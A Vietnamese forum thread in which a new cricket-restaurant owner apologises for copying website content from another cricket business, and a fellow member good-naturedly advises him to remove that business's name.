Chân thành cảm ơn bác! Đúng là mình copy trên web, vì chưa có thời gian edit bài , chủ yếu post lên để mong nhờ các bác nhặt sạn hộ mình . Nội dung mình sẽ edit lại. Trang web đầu tiên mình biết là web của bác osa.vn đó. Nhờ nó mà mình thích dế luôn tới giờ. Các món ăn mình cop từ web của bác đó. Cảm ơn nhiều nghen! Mới thiết kế xong website , chưa kịp ra quán chụp mấy cái hình thật. Đừng khóc nhè nữa bác ạ. Trâng xấu quá đi. Mục đích của mình làm website này là muốn quảng bá cho nhiều người biết tới các món ăn độc lạ , dân dã ,. Như thế các anh em nhà nông mới bán được hàng. Chứ em mở quán dế . mà chính em mời mấy thằng bạn nó cũng chẳng dám ăn, nói ghê ghê sao ấy. Dụ mãi nó mới nhậu được vại bia với dế và bò cạp! Thế mới biết ko phải ai cũng ăn được mấy món độc đâu. ANh em mình ra sức giới thiệu để càng nhiều người biết đến dế càng tốt. Còn về việc bản quyền em xin lỗi, Bạn em nó cung cấp , em cứ poste lên web cho mọi người xem ! Ai thích cop cái gì ở Website em cũng được tất!:D Em ko biết ở ngoài Bắc thế nào , chứ sao trong Nam em, kén ăn thế. Một KG bán tới gần một tuần mới hết. Bỏ ra cả trăm triệu làm quán ko biết bao giờ mới thu lại được!!!
 
Last edited by a moderator:
Bạn đừng áy náy việc bản quyền gì hết . Vì nhiều web copy của mình mình có ý kiến gì đâu . Bản thân mấy bức hình trong web của mình mình lấy từ mạng đó . Vì mình ko có máy ảnh xịn để chụp . Còn phần nội dung thì tự viết.

Chỉ tại bạn giới thiệu sản phẩm doanh nghiệp mà bê nguyên tên Doanh nghiệp khác vào LỘ quá ^ ^. Mình góp ý thế là chân thành . Mình muốn bạn sửa để khỏi mất khách đó thôi.
 
Status
Không còn mở để tiếp tục thảo luận
Back
Top